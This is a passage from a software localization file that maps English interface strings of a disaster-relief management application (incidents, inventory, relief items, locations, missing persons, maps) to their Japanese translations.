'Incident Categories': 'インシデントカテゴリ',
'Incident Details': 'インシデントの詳細',
'Incident Report Details': 'インシデントレポートの詳細',
'Incident Report added': 'インシデントレポートを追加しました',
'Incident Report deleted': 'インシデントレポートを削除しました',
'Incident Report updated': 'インシデントレポートを更新しました',
'Incident Report': 'インシデントレポート',
'Incident Reporting System': 'インシデントの報告を行ないます',
'Incident Reporting': 'インシデントレポート',
'Incident Reports': 'インシデントレポート',
'Incident added': 'インシデントを追加しました',
'Incident deleted': 'インシデントを削除しました',
'Incident updated': 'インシデントを更新しました',
'Incident': 'インシデント',
'Incidents': 'インシデント',
'Incoming Shipment canceled': '到着する配送が取り消されました',
'Incoming Shipment updated': '入荷した物資が更新されました',
'Incoming': '入荷',
'Incomplete': '未完了',
'Individuals': '個人',
'Industrial Crime': '産業犯罪',
'Industrial': '産業',
'Industry Fire': '工場から出火',
'Industry close to village/camp': '村落/仮泊施設の周辺に工場が存在',
'Infant (0-1)': '乳児(0-1歳)',
'Infectious Disease': '感染症',
'Infectious Diseases': '感染症',
'Infestation': '害虫の大量発生',
'Informal Leader': '非公式なリーダー',
'Informal camp': '非指定避難所',
'Information gaps': '情報のギャップ',
'Infusion catheters available': '注入カテーテルが利用可能',
'Infusion catheters need per 24h': '24時間毎に必要な注入カテーテル数',
'Infusion catheters needed per 24h': '24時間ごとに、注入カテーテルが必要',
'Infusions available': '点滴が利用可能',
'Infusions needed per 24h': '24時間毎に必要な点滴の数',
'Input Job': 'Jobのインポート',
'Inspected': '調査済み',
'Inspection Date': '調査した日付',
'Inspection date and time': '調査日時',
'Inspection time': '調査した時刻',
'Inspector ID': '調査者ID',
'Instance Type': 'インスタンスタイプ',
'Instant Porridge': 'インスタント粥',
'Institution': 'その他の組織',
'Insufficient Privileges': '権限が足りません',
'Insufficient vars: Need module, resource, jresource, instance': '不十分な変数: module, resource, jresource, instance が必要です',
'Insufficient': '不足',
'Intake Items': 'アイテムの受け入れ',
'Intergovernmental Organization': '国際政府間組織',
'Interior walls, partitions': '室内の壁、仕切り',
'Internal Features': '内部機能',
'Internal State': '内部状態',
'International NGO': '国際NGO',
'International Organization': '国際機関',
'International Staff': '国外からのスタッフ',
'Intervention': '介入',
'Interview taking place at': 'インタビュー実施場所',
'Invalid Query': '無効なクエリ',
'Invalid email': '無効な電子メール',
'Invalid login': '無効なログイン',
'Invalid request!': 'リクエストは無効です。',
'Invalid ticket': '無効なチケット',
'Invalid': '無効な',
'Inventories with Item': 'この物資がある在庫',
'Inventories': '在庫管理',
'Inventory Item Details': '救援物資の在庫詳細',
'Inventory Item added': '救援物資の在庫を追加しました',
'Inventory Item deleted': '備蓄物資を削除しました',
'Inventory Item updated': '備蓄物資を更新しました',
'Inventory Item': '備蓄物資',
'Inventory Items Available for Request Item': '要求された物資に適合する、倉庫内の物資',
'Inventory Items': '備蓄物資',
'Inventory Management': '物資の管理',
'Inventory Store Details': '物資集積地点の詳細',
'Inventory Store added': '物資集積地点を追加しました',
'Inventory Store deleted': '物資集積地点を削除しました',
'Inventory Store updated': '物資集積地点を更新しました',
'Inventory Store': '物資集積地点',
'Inventory Stores': '物資集積地点',
'Inventory functionality is available for:': '備蓄機能を利用可能:',
'Inventory of Effects': '携帯品の目録',
'Inventory': '在庫',
'Inventory/Ledger': '在庫 / 元帳',
'Is adequate food and water available for these institutions?': '関係者に対して十分な水と食料が供給されていますか?',
'Is it safe to collect water?': '水の確保は安全に行えるか?',
'Is there any industrial or agro-chemical production close to the affected area/village?': '村落/集落の近くに、工場あるいは農業化学プラントなどが存在しますか?',
'Is this a strict hierarchy?': 'これは厳密な階層構造ですか?',
'Issuing Authority': '発行機関',
'It is built using the Template agreed by a group of NGOs working together as the': '聞き取り項目のテンプレートは、以下リンクのNGO組織と協同で作成されています。',
'Item Added to Shipment': '物資を輸送に追加しました',
'Item Catalog Categories': '物資カタログカテゴリ',
'Item Catalog Category Details': '救援物資カタログのカテゴリ詳細',
'Item Catalog Category added': '救援物資カタログのカテゴリを追加しました',
'Item Catalog Category deleted': '救援物資カタログのカテゴリを削除しました',
'Item Catalog Category updated': '物資カタログカテゴリを更新しました',
'Item Catalog Category': '救援物資カタログのカテゴリ',
'Item Catalog Details': '物資カタログの詳細',
'Item Catalog added': '救援物資カタログを追加しました',
'Item Catalog deleted': '物資カタログを削除しました',
'Item Catalog updated': '物資カタログを更新しました',
'Item Catalogs': '救援物資カタログ',
'Item Categories': '物資カテゴリ',
'Item Category Details': '物資カテゴリの詳細',
'Item Category added': '救援物資カテゴリを追加しました',
'Item Category deleted': '救援物資カテゴリを削除しました',
'Item Category updated': '物資カテゴリを更新しました',
'Item Category': '物資カテゴリ',
'Item Details': '救援物資の詳細',
'Item Pack Details': '救援物資パックの詳細',
'Item Pack added': '物資パックを追加しました',
'Item Pack deleted': '救援物資のパックを削除しました',
'Item Pack updated': '救援物資パックを更新しました',
'Item Packs': '物資パック',
'Item Sub-Categories': '救援物資のサブカテゴリ',
'Item Sub-Category Details': '物資サブカテゴリの詳細',
'Item Sub-Category added': '救援物資のサブカテゴリを追加しました',
'Item Sub-Category deleted': '物資サブカテゴリを削除しました',
'Item Sub-Category updated': '救援物資サブカテゴリを更新しました',
'Item Sub-Category': '物資サブカテゴリ',
'Item added to shipment': '物資が輸送に回りました',
'Item added': '救援物資を追加しました',
'Item already in Bundle!': '物資がすでにバンドルに存在しています。',
'Item already in Kit!': '救援物資は既にキットに存在しています',
'Item already in budget!': '物資は既に予算に登録されています',
'Item deleted': '物資を削除しました',
'Item updated': '救援物資を更新しました',
'Item': '物資',
'Items': '救援物資',
'Japan': '日本',
'Japanese': '日本語',
'Jerry can': 'ジェリ缶',
'Jew': 'ユダヤ教徒',
'Job Market': '求人',
'Job Title': '肩書き',
'Jobs': '職業',
'Just Once': '一度だけ',
'KPIs': 'KPI',
'Key Details': 'Keyの詳細',
'Key added': 'キーを追加しました',
'Key deleted': 'キーを削除しました',
'Key updated': 'キーを更新しました',
'Key': 'キー',
'Keys': 'キー',
'Kit Contents': 'Kitの内容',
'Kit Details': 'Kitの詳細',
'Kit Updated': 'キットを更新しました',
'Kit added': 'キットを追加しました',
'Kit deleted': 'キットを削除しました',
'Kit updated': 'キットを更新しました',
'Kit': 'キット',
'Kits': 'キット',
'Known Identities': '既知のID',
'Known incidents of violence against women/girls': '女性に対する暴力行為が発生した',
'Known incidents of violence since disaster': '災害発生後に暴力行為が発生した',
'LICENSE': 'ライセンス',
'LMS Administration': 'LMSの管理',
'Label': 'ラベル',
'Lack of material': '資材不足',
'Lack of school uniform': '学校制服が不足',
'Lack of supplies at school': '学校用物資の不足',
'Lack of transport to school': '学校への輸送手段の不足',
'Lactating women': '授乳中の女性の数',
'Lahar': 'ラハール',
'Landslide': '地すべり',
'Language': 'Language 言語',
'Last Name': '姓',
'Last known location': '最後に目撃された場所',
'Last name': '姓',
'Last synchronization time': 'データ同期の最終実施時刻',
'Last updated': '最終更新日',
'Last updated by': '最終更新者',
'Last updated on': '直近のアップデート実施時刻',
'Latitude & Longitude': '緯度&経度',
'Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': '緯度は南北方向(上下)を定義します。赤道ではゼロ、北半球ではプラス、南半球ではマイナスとなります。',
'Latitude is North-South (Up-Down).': '緯度は南北(上下)です',
'Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': '緯度は赤道では0、北半球ではプラス、南半球ではマイナスになります',
'Latitude should be between': '緯度の値として有効な値は',
'Latitude': '緯度',
'Latrines': 'トイレ',
'Law enforcement, military, homeland and local/private security': '法執行機関、自衛隊、警察および警備会社',
'Layer Details': 'レイヤの詳細',
'Layer added': 'レイヤを追加しました',
'Layer deleted': 'レイヤを削除しました',
'Layer updated': 'レイヤを更新しました',
'Layer': 'レイヤ',
'Layers updated': 'レイヤを更新しました',
'Layers': 'レイヤ',
'Layout': 'レイアウト',
'Legend Format': '凡例形式',
'Length': '長さ',
'Level 1 Assessment Details': 'レベル1アセスメントの詳細',
'Level 1 Assessment added': 'レベル1アセスメントを追加しました',
'Level 1 Assessment deleted': 'レベル1のアセスメントを削除しました',
'Level 1 Assessment updated': 'レベル1アセスメントを更新しました',
'Level 1 Assessments': 'レベル1 アセスメント',
'Level 1': 'レベル1',
'Level 2 Assessment Details': 'レベル2アセスメントの詳細',
'Level 2 Assessment added': 'レベル2アセスメントを追加しました',
'Level 2 Assessment deleted': 'レベル2アセスメントを削除しました',
'Level 2 Assessment updated': 'レベル2アセスメントを更新しました',
'Level 2 Assessments': 'レベル2アセスメント',
'Level 2 or detailed engineering evaluation recommended': 'レベル2あるいは詳細な技術的評価を行うことを推奨します',
'Level 2': 'レベル2',
'Level': 'レベル',
'Library support not available for OpenID': 'OpenIDのライブラリサポートが利用できません',
'License Plate': 'ナンバープレート',
'Line': '行',
'LineString': '折れ線',
'Link Item & Shipment': 'アイテムと輸送を紐付ける',
'Link an Item & Shipment': 'アイテムと出荷を結び付ける',
'Linked Records': '参照しているレコード',
'Linked records': '関連しているレコード',
'List / Add Baseline Types': '基準値タイプの一覧 / 追加',
'List / Add Impact Types': '災害影響のタイプを表示 / 追加',
'List / Add Services': 'サービスの一覧表示 / 追加',
'List / Add Types': 'タイプの一覧表示 / 追加',
'List Activities': '支援活動一覧',
'List Aid Requests': '援助要請の一覧',
'List All Entries': '全てのエントリ一覧',
'List All Memberships': '全てのメンバシップ一覧',
'List All Reports': '報告すべての一覧',
'List All': '全項目一覧',
'List Alternative Items': '代わりの物資一覧',
'List Assessment Summaries': 'アセスメント要約の一覧',
'List Assessments': 'アセスメント一覧',
'List Asset Assignments': '資産割り当ての一覧',
'List Assets': '資産一覧',
'List Baseline Types': '基準値タイプ一覧',
'List Baselines': '基準値一覧',
'List Brands': '銘柄の一覧',
'List Budgets': '予算の一覧',
'List Bundles': 'Bundleの一覧',
'List Catalog Items': '物資カタログの一覧',
'List Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 関係一覧',
'List Checklists': 'チェックリスト一覧',
'List Cluster Subsectors': 'クラスタのサブセクタ一覧',
'List Cluster': 'クラスタ一覧',
'List Clusters': 'クラスタ一覧',
'List Commitment Items': 'コミットされた救援物資の一覧',
'List Commitments': 'コミットメントの一覧',
'List Configs': '設定一覧',
'List Conflicts': 'データ競合一覧',
'List Contact Information': '連絡先情報の一覧',
'List Contacts': '連絡先一覧',
'List Credentials': '証明書一覧',
'List Current': '現在の一覧',
'List Distribution Items': '配給物資リスト',
'List Distributions': '配給所リスト',
'List Documents': '文書の一覧',
'List Donors': '資金提供組織一覧',
'List Feature Layers': 'Featureレイヤリスト',
'List Flood Reports': '洪水レポート一覧',
'List GPX Layers': 'GPXレイヤ一覧',
'List Groups': 'グループ一覧',
'List Groups/View Members': 'グループを一覧/メンバーを表示',
'List Hospitals': '病院の一覧',
'List Identities': 'ID一覧',
'List Images': '画像の一覧',
'List Impact Assessments': '災害影響範囲アセスメント一覧',
'List Impact Types': '災害影響のタイプ一覧',
'List Impacts': '被害一覧',
'List Incident Reports': 'インシデントレポート一覧',
'List Incidents': 'インシデント一覧',
'List Inventory Items': '備蓄物資リスト',
'List Inventory Stores': '物資集積地点リスト',
'List Item Catalog Categories': '救援物資カタログのカテゴリ一覧',
'List Item Catalogs': '救援物資カタログ一覧',
'List Item Categories': '物資カテゴリ一覧',
'List Item Packs': '物資パックの一覧',
'List Item Sub-Categories': '物資サブカテゴリ一覧',
'List Items': '救援物資一覧',
'List Keys': 'Keyの一覧',
'List Kits': 'Kit一覧',
'List Layers': 'レイヤ一覧',
'List Level 1 Assessments': 'レベル1アセスメントの一覧',
'List Level 1 assessments': 'レベル1アセスメント一覧',
'List Level 2 Assessments': 'レベル2のアセスメント一覧',
'List Level 2 assessments': 'レベル2アセスメント一覧',
'List Locations': 'ロケーション一覧',
'List Log Entries': 'ログエントリ一覧',
'List Map Profiles': '地図設定の一覧',
'List Markers': 'マーカー一覧',
'List Members': 'メンバ一覧',
'List Memberships': 'メンバシップ一覧',
'List Messages': 'メッセージ一覧',
'List Metadata': 'メタデータ一覧',
'List Missing Persons': '行方不明者リストを表示',
'List Need Types': '需要タイプ一覧',
'List Needs': 'ニーズ一覧',
'List Notes': '追加情報一覧',
'List Offices': 'オフィス一覧',
'List Organizations': '団体一覧',
'List Peers': 'データ同期先一覧',
'List Personal Effects': '携帯品のリスト',
'List Persons': '人物情報一覧',
'List Photos': '写真リスト',
'List Positions': '場所一覧',
'List Problems': '問題一覧',
'List Projections': '地図投影法リスト',
'List Projects': 'プロジェクト一覧',
'List Rapid Assessments': '被災地の現況アセスメント一覧',
'List Received Items': '受領された物資の一覧',
'List Received Shipments': '受領された輸送一覧',
'List Records': 'レコード一覧',
'List Registrations': '登録証明書の一覧',
'List Reports': 'レポート一覧',
'List Request Items': '物資要請リスト',
'List Requests': '支援要請の一覧',
'List Resources': 'リソース一覧',
'List Responses': '回答の一覧',
'List Rivers': '河川リスト',
'List Roles': '役割一覧',
'List Sections': 'Section一覧',
'List Sectors': '活動分野の一覧',
'List Sent Items': '送付した物資一覧',
'List Sent Shipments': '送付済み物資一覧',
'List Service Profiles': 'サービスプロファイル一覧',
'List Settings': '設定一覧',
'List Shelter Services': '避難所での提供サービス一覧',
'List Shelter Types': '避難所タイプ一覧',
'List Shelters': '避難所の一覧',
'List Shipment Transit Logs': '物資輸送履歴の一覧',
'List Shipment/Way Bills': '輸送伝票/貨物運送状の一覧',
'List Shipment<>Item Relation': '輸送と物資の関連性一覧',
'List Shipments': '配送の一覧',
'List Sites': 'Site一覧',
'List Skill Types': 'スキルタイプを一覧表示',
'List Skills': 'スキルを一覧表示',
'List Solutions': '解決案一覧',
'List Staff Types': 'スタッフタイプ一覧',
'List Staff': 'スタッフ一覧',
'List Status': '状況一覧',
'List Storage Bin Type(s)': 'Storage Binタイプ一覧',
'List Storage Bins': 'Storage Bin一覧',
'List Storage Location': '備蓄地点の一覧',
'List Subscriptions': '寄付申し込み一覧',
'List Support Requests': '支援要求のリスト',
'List Survey Answers': '調査の回答の一覧',
'List Survey Questions': 'Survey Question一覧',
'List Survey Sections': 'Survey Sectionsの一覧',
'List Survey Series': '一連の調査リスト',
'List Survey Templates': '調査テンプレートの一覧',
'List TMS Layers': 'TMS レイヤの一覧',
'List Tasks': 'タスク一覧',
'List Teams': 'チーム一覧',
'List Themes': 'テーマ一覧',
'List Tickets': 'チケット一覧',
'List Tracks': '追跡情報の一覧',
'List Units': '単位一覧',
'List Users': 'ユーザ一覧',
'List Volunteers': 'ボランティアの表示',
'List WMS Layers': 'WMSレイヤ一覧',
'List Warehouse Items': '倉庫に備蓄中の物資一覧',
'List Warehouses': '倉庫の一覧',
'List all': '全項目を表示',
'List of Items': '物資一覧',
'List of Missing Persons': '行方不明者リスト',
'List of Peers': 'データ同期先一覧',
'List of Reports': 'レポート一覧',
'List of Requests': '支援要請の一覧',
'List of Roles': '権限リスト',
'List of Spreadsheets uploaded': 'アップロード済スプレッドシート一覧',
'List of Spreadsheets': 'スプレッドシート一覧',
'List of Volunteers for this skill set': 'このスキルを所持するボランティアの一覧',
'List of addresses': '住所一覧',
'List unidentified': '身元不明者の一覧',
'List': '一覧',
'List/Add': '一覧/追加',
'Lists "who is doing what & where". Allows relief agencies to coordinate their activities': '救援団体は自身の支援活動の内容と場所を登録し、公開することで、他の組織との活動を調整することが可能となります。',
'Live Help': 'ライブヘルプ',
'Livelihood': '生計',
'Load Cleaned Data into Database': '整形したデータをデータベースへロード',
'Load Details': '詳細情報の読み込み',
'Load Raw File into Grid': 'Rawファイルをグリッドにロードしてください',
'Load the details to help decide which is the best one to keep out of the 2.': '2つのうちどちらを残すほうがよいか判断するため、詳細情報を確認します。',
'Loading Locations': 'ロケーションデータロード中',
'Loading Locations...': '位置を読込みしています ...',
'Loading': '読み込み中',
'Local Name': 'ローカル名',
'Local Names': 'ローカル名',
'Location 1': 'ロケーション 1',
'Location 2': 'ロケーション 2',
'Location De-duplicated': 'ロケーションの重複解消',
'Location Details': 'ロケーションの詳細',
'Location Hierarchy Level 0 Name': 'ロケーション階層レベル0の名前',
'Location Hierarchy Level 1 Name': 'ロケーション階層レベル1の名前',
'Location Hierarchy Level 2 Name': 'ロケーション階層レベル2の名前',
'Location Hierarchy Level 3 Name': 'ロケーション階層レベル3の名前',
'Location Hierarchy Level 4 Name': 'ロケーション階層レベル4の名前',
'Location Hierarchy Level 5 Name': 'ロケーション階層レベル5の名前',
'Location added': 'ロケーションを追加しました',
'Location cannot be converted into a group.': 'ロケーションはグループに変換できません',
'Location deleted': 'ロケーションを削除しました',
'Location details': 'ロケーションの詳細',
'Location group cannot be a parent.': 'ロケーショングループは親にできません',
'Location group cannot have a parent.': 'ロケーショングループは親を持つことができません。',
'Location updated': 'ロケーションを更新しました',
'Location': 'ロケーション',
'Location: ': 'ロケーション: ',
'Locations De-duplicator': 'ロケーションの重複解消',
'Locations of this level need to have a parent of level': 'このレベルのロケーションには、親属性となるレベルが必要です',
'Locations should be different!': '異なる位置を設定してください!',
'Locations': 'ロケーション',
'Lockdown': '厳重監禁',
'Log Entry Details': 'ログエントリの詳細',
'Log entry added': 'ログエントリを追加しました',
'Log entry deleted': 'ログエントリを削除しました',
'Log entry updated': 'ログエントリを更新しました',
'Log': 'ログ',
'Logged in': 'ログインしました',
'Logged out': 'ログアウトしました',
'Login': 'ログイン',
'Logistics Management System': '物流管理システム',
'Logistics Management': '物流管理',
'Logistics': '物流',
'Logo file %s missing!': 'ロゴファイル%sが見つかりません。',
'Logo': 'ロゴ',
'Logout': 'ログアウト',
'Long Text': '詳細テキスト',
'Longitude is West - East (sideways). Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere. Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas. These need to be added in Decimal Degrees.': '経度は東西方向(横)の座標軸です。緯度は南北方向(上下)の座標軸です。赤道ではゼロ、北半球ではプラス、南半球ではマイナスとなります。経度は、子午線(グリニッジ標準時)をゼロとして、東(ヨーロッパ、アジア)がプラスとなります。西(大西洋、アメリカ)がマイナスです。10進法で記入してください。',
'Longitude is West - East (sideways). Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': '経度は東西(横)です。経度は子午線(グリニッジ標準時)でゼロ、東(ヨーロッパ、アジア)でプラスです。西(大西洋、アメリカ)でマイナスです。',
'Longitude is West - East (sideways).': '経度は東西です(横方向)',
'Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': '経度はグリニッジ子午線(グリニッジ標準時)上が0度です。東側に向かってヨーロッパやアジアの各地で正の値となります。西に向かって大西洋やアメリカの各地で負の値となります。',
'Longitude should be between': '経度の値の有効な範囲は',
'Longitude': '経度',
'Looking up Parents': '親を検索',
'Looting': '略奪',
'Lost Password': 'パスワードの紛失',
'Lost': '行方不明',
'Low': '低',
'Magnetic Storm': '磁気嵐',
'Main cash source': '主な現金収入源',
'Main income sources before disaster': '災害発生前の主な収入源',
'Major expenses': '主な費用',
'Major outward damage': '大きな損傷あり',
'Make Commitment': 'コミットの作成',
'Make Pledge': '寄付の作成',
'Make Request': '支援を要請する',
'Make a Request for Aid': '援助要請を登録',
'Make a Request': '支援要請を登録',
'Make preparations per the <instruction>': '<instruction>に従って準備作業を行う',
'Male': '男性',
'Malnutrition present prior to disaster': '災害前から栄養失調が発生していた',
'Manage Category': 'カテゴリ管理',
'Manage Item catalog': '物資カタログの管理',
'Manage Kits': 'Kitsの管理',
'Manage Relief Item Catalogue': '救援アイテムカタログの管理',
'Manage Sub-Category': 'サブカテゴリの管理',
'Manage Users & Roles': 'ユーザと役割の管理',
'Manage Warehouses/Sites': '倉庫/Sitesの管理',
'Manage requests for supplies, assets, staff or other resources. Matches against Inventories where supplies are requested.': '支援物資、資産、人員、その他のリソースに対する要求を管理します。支援物資が要求された時に在庫と照合します。',
'Manage requests of hospitals for assistance.': '病院からの支援要請の管理',
'Manage volunteers by capturing their skills, availability and allocation': 'ボランティアのスキル、稼働状況、割り当て状況を管理します',
'Manage': '管理',
'Manager': 'マネージャ',
'Managing Office': 'オフィスの管理',
'Managing, Storing and Distributing Relief Items': '救援物資の保管、流通、配布状況を管理します',
'Managing, Storing and Distributing Relief Items.': '救援物資の管理、保存、配布状況を管理します。',
'Mandatory. In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': '必須項目。GeoServerでのこの項目はレイヤー名となります。WFSの get Capabilitiesでは、コロン( : )の後に付与される FeatureTypeとして表示されます。',
'Mandatory. The URL to access the service.': '省略できません。サービスにアクセスするためのURLです。',
'Manual Synchronization': 'データ手動同期',
'Manual': 'マニュアル',
'Many': '多数',
'Map Profile added': '地図の設定を追加しました',
'Map Profile deleted': '地図設定を削除しました',
'Map Profile updated': '地図設定を更新しました',
'Map Profile': '地図の設定',
'Map Profiles': '地図の設定',
'Map Height': '地図の縦高',
'Map Service Catalog': '地図サービスカタログ',
'Map Settings': '地図の設定',
'Map Viewing Client': '地図閲覧クライアント',
'Map Width': '地図の横幅',
'Map of Hospitals': '病院の地図',
'Map': '地図',
'Mapping': 'マッピング',
'Marine Security': '海上保安',
'Marital Status': '婚姻状況',
'Marker Details': 'マーカーの詳細',
'Marker added': 'マーカーを追加しました',
'Marker deleted': 'マーカーを削除しました',
'Marker updated': 'マーカーを更新しました',
'Marker': 'マーカー',
'Markers': 'マーカー',
'Master Message Log to process incoming reports & requests': '受け取ったレポートと要求を処理するマスターメッセージログ',
'Master Message Log': 'マスターメッセージログ',
'Match Percentage': '一致率',
'Match Requests': '支援要請マッチ',
'Match percentage indicates the % match between these two records': 'マッチの割合は、2つのレコードの間のマッチ状況をあらわします',
'Matching Catalog Items': '適合する救援物資カタログ',
'Matching Records': '一致するレコード',
'Matrix of Choices (Multiple Answers)': '選択肢 (複数可)',
'Matrix of Choices (Only one answer)': '選択肢 (複数選択不可)',
'Matrix of Text Fields': 'テキストフィールドのマトリックス',
'Max Persons per Dwelling': '住居ごとの最大収容人数',
'Maximum Weight': '最大重量',
'Maximum weight capacity of the Storage Location followed by choosing the unit from the drop down list.': 'ドロップダウンリストで単位を選択してから、備蓄地点の最大重量を指定します。',
'Maximum weight capacity of the items the storage bin can contain. followed by choosing the unit from the drop down list.': 'storage binに収容することができるアイテムの最大重量を指定します。ドロップダウンリストから、単位を選択してください。',
'Measure Area: Click the points around the polygon & end with a double-click': '面積を計測: 多角形の頂点を順にクリックし、ダブルクリックで終了',
'Measure Length: Click the points along the path & end with a double-click': '距離を計測: 経路上の中継点をクリックして、終点でダブルクリックしてください',
'Medical and public health': '医療、公衆衛生',
'Medicine': '薬品',
'Medium': '中',
'Megabytes per Month': '1月毎のメガバイト数',
'Member removed from Group': 'グループからメンバを削除しました',
'Members': 'メンバ',
'Membership Details': 'メンバシップの詳細',
'Membership updated': 'メンバシップを更新しました',
'Membership': 'メンバシップ',
'Memberships': 'メンバシップ',
'Message Details': 'メッセージの詳細',
'Message Sent': 'メッセージが送信されました',
'Message Variable': 'メッセージ変数',
'Message added': 'メッセージを追加しました',
'Message deleted': 'メッセージを削除しました',
'Message field is required!': 'メッセージは必須です',
'Message sent to outbox': 'メッセージを送信箱に送りました',
'Message updated': 'メッセージを更新しました',
'Message variable': 'メッセージ変数',
'Message': 'メッセージ',
'Messages': 'メッセージ',
'Messaging settings updated': 'メッセージング設定を更新しました',
'Messaging': 'メッセージング',
'Metadata Details': 'メタデータの詳細',
'Metadata added': 'メタデータを追加しました',
'Metadata can be supplied here to be applied to all uploaded photos, if desired.': '必要に応じて、アップロードした全ての画像に適用されるメタデータをここで入力できます。',
'Metadata deleted': 'メタデータを削除しました',
'Metadata updated': 'メタデータを更新しました',
'Metadata': 'メタデータ',
'Meteorite': '隕石落下',
'Meteorological (inc. flood)': '気象 (洪水を含む)',
'Method used': '使用されるメソッド',
'Micronutrient malnutrition prior to disaster': '災害前から栄養失調傾向あり',
'Middle Name': 'ミドルネーム',
'Migrants or ethnic minorities': '移民、あるいは少数民族の数',
'Military': '軍隊',
'Minimum Bounding Box': '最小バウンディングボックス',
'Minimum shift time is 6 hours': '最小シフト時間は6時間です。',
'Minor/None': '軽微 / なし',
'Minorities participating in coping activities': '少数民族が災害対応に従事',
'Minute': '分',
'Minutes must be a number between 0 and 60': '分には0-60の間の数字を記入してください',
'Minutes must be a number greater than 0 and less than 60': '分数は0から60の間で入力してください',
'Minutes per Month': '1月毎の分数',
'Minutes should be a number greater than 0 and less than 60': '分は0から60の間で入力してください',
'Miscellaneous': 'その他',
'Missing Person Details': '行方不明者の詳細',
'Missing Person Reports': '行方不明者レポート',
'Missing Person': '行方不明者',
'Missing Persons Registry': '行方不明者の登録',
'Missing Persons Report': '行方不明者のレポート',
'Missing Persons': '行方不明者',
'Missing Report': '行方不明レポート',
'Missing Senior Citizen': '高齢者の行方不明',
'Missing Vulnerable Person': '被介護者の行方不明',
'Missing': '行方不明',
'Mobile Assess.': 'モバイルアセスメント',
'Mobile Basic Assessment': 'モバイルの基本アセスメント',
'Mobile Basic': 'モバイルの基礎',
'Mobile Phone': '携帯番号',
'Mobile': 'モバイル',
'Mode': 'モード',
'Modem Settings': 'モデム設定',
'Modem settings updated': 'モデム設定を更新しました',
'Moderate': '中程度',
'Moderator': 'モデレータ',
'Modify Feature: Select the feature you wish to deform & then Drag one of the dots to deform the feature in your chosen manner': '地物の変更: 変形する地物を選択し、点の一つをドラッグすることで地物の形を修正可能です。',
'Modify Information on groups and individuals': 'グループと個人の情報更新',
'Modifying data in spreadsheet before importing it to the database': 'データベース登録前に、スプレッドシート内のデータ項目を修正',
'Module Administration': 'モジュール管理',
'Module disabled!': 'モジュールが無効です',
'Module provides access to information on current Flood Levels.': 'このモジュールにより、洪水の現在の水位情報にアクセス可能です',
'Module stores structured reports done by Professional Organizations - currently data includes WFP Assessments.': 'モジュールでは、専門団体によって作成された調査文書を管理します。データには、WFP(国連世界食糧計画)アセスメントも含まれます。',
'Monday': '月曜日',
'Monthly Cost': '月額費用',
'Monthly Salary': '給与(月額)',
'Months': '月',
'Morgue Status': '死体安置所のステータス',
'Morgue Units Available': '死体安置所の収容可能数',
'Mosque': 'モスク',
'Motorcycle': 'オートバイ',
'Moustache': '口ひげ',
'Move Feature: Drag feature to desired location': 'Featureの移動: Feature を希望するロケーションにドラッグしてください',
'Movements (Filter In/Out/Lost)': '活動 (フィルター イン/アウト/ロスト)',
'MultiPolygon': 'マルチポリゴン',
'Multiple Choice (Multiple Answers)': '複数選択(複数回答)',
'Multiple Choice (Only One Answer)': '複数選択(1つだけ回答)',
'Multiple Matches': '複数の結果が適合しました',
'Multiple Text Fields': '複数の入力項目',
'Multiple': '複数',
'Multiplicator': '乗数',
'Muslim': 'イスラム教徒',
'Must a location have a parent location?': 'ある場所にはその親の場所が無ければならないですか?',
'My Current function': '現在登録している機能',
'My Tasks': '自分のタスク',
'N/A': '該当なし',
'NZSEE Level 1': 'NZSEE レベル1',
'NZSEE Level 2': 'NZSEE レベル 2',
'Name and/or ID Label': '名前および/またはIDラベル',
'Name and/or ID': '名前および/またはID',
'Name of Storage Bin Type.': '物資保管タイプの名前です。',
'Name of the file (& optional sub-path) located in static which should be used for the background of the header.': 'ヘッダーの背景に使用される、static にあるファイルの名前 (オプションでサブパス)。',
'Name of the file (& optional sub-path) located in static which should be used for the top-left image.': '左上の画像として使用される、static にあるファイルの名前 (オプションでサブパス)。',
'Name of the file (& optional sub-path) located in views which should be used for footer.': 'フッターに使われるビューにあるファイル名 (オプションとしてサブパス)。',
'Name of the person in local language and script (optional).': '現地言語での名前と表記(オプション)',
'Name of the unit or department this report refers to. Leave empty if your hospital has no subdivisions.': 'このレポートに関連する組織や部署の名前。部署をもたない病院の場合は空欄にしてください。',
'Name or Job Title': '名前あるいは役職名',
'Name': '名前',
'Name, Org and/or ID': '名前、組織、IDなど',
'Name/Model/Type': '名前/ モデル/タイプ',
'Name: ': '名前: ',
'Names can be added in multiple languages': '名前は、複数の言語で記述することができます。',
'National ID Card': 'ナショナルIDカード',
'National NGO': '国内NGO',
'National Staff': '現地スタッフ',
'Nationality of the person.': 'この人物の国籍です。',
'Nationality': '国籍',
'Nautical Accident': '船舶事故',
'Nautical Hijacking': '船舶ハイジャック',
'Need Type Details': '需要タイプの詳細',
'Need Type added': '需要タイプを追加しました',
'Need Type deleted': '需要タイプを削除しました',
'Need Type updated': '需要タイプを更新しました',
'Need Type': '需要タイプ',
'Need Types': '需要タイプ',
'Need added': 'ニーズを追加しました',
'Need deleted': 'ニーズを削除しました',
'Need to be logged-in to be able to submit assessments': '評価を確定させるには、ログインが必要です',
'Need to configure Twitter Authentication': 'Twitterの認証を設定する必要があります',
'Need to select 2 Locations': 'ロケーションを2つ指定してください',
'Need to specify a Budget!': '予算を指定する必要があります。',
'Need to specify a Kit!': 'Kitを指定する必要があります。',
'Need to specify a Resource!': 'リソースを指定する必要があります。',
'Need to specify a bundle!': 'bundleを指定する必要があります。',
'Need to specify a group!': 'グループを指定する必要があります。',
'Need to specify a location to search for.': '検索対象となるロケーションを指定する必要があります。',
'Need to specify a role!': '役割を指定する必要があります。',
'Need to specify a service!': 'サービスを指定してください!',
'Need to specify a table!': 'テーブルを指定する必要があります。',
'Need to specify a user!': 'ユーザを指定する必要があります。',
'Need updated': 'ニーズを更新しました',
'Needs Details': '需要の詳細',
'Needs to reduce vulnerability to violence': '暴力行為の対策として必要な物資 / サービス',
